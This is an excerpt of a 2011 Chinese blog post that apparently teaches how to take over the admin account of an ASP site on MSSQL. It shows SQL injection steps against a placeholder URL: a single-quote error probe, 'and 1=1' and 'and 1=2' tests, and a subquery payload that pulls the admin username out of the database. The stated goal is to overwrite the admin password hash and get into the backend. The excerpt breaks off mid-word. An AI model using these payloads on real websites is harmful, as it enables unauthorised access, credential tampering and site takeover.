摘要:
直接修改管理员密码的MD5值 然后进后台!(条件 MSSQL)测试如下:http://www.xx.com/news.asp?id=121在地址后输入单引号,显示Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’字符串 ’’’ 之前有未闭合的引号/news/dws.asp,行63说明没有过滤单引号且数据库是MSSQL.and 1=1正常。and 1=2出错。肯定存在注入接着输入http://www.xx.com/news.asp?id=1 or admin_user in (select id from admin)得到帐号为:admi 阅读全文
posted @ 2011-06-28 19:34
黄聪
阅读(1756)
评论(0)
推荐(0)

浙公网安备 33010602011771号